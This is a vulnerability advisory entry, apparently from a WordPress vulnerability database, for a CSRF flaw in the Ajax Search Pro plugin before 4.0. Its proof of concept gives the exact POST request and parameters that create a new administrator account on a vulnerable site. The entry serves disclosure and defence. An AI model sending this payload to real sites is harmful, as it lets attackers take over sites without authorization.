WordPress Plugin Vulnerabilities
Ajax Search Pro < 4.0 - Cross-Site Request Forgery (CSRF) Add User
Description
The ajax-search-pro WordPress plugin was affected by a Cross-Site Request Forgery (CSRF) Add User security vulnerability.
Proof of Concept
This will register an administrator with username "xADMIN" and password "xPASS": POST request to: /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput With POST data: wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator
Affects Plugins
References
Classification
Type
CSRF
OWASP top 10
CWE
Miscellaneous
Submitter
A. Samman
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2015-03-18 (about 9 years ago)
Added
2015-03-21 (about 9 years ago)
Last Updated
2019-10-21 (about 4 years ago)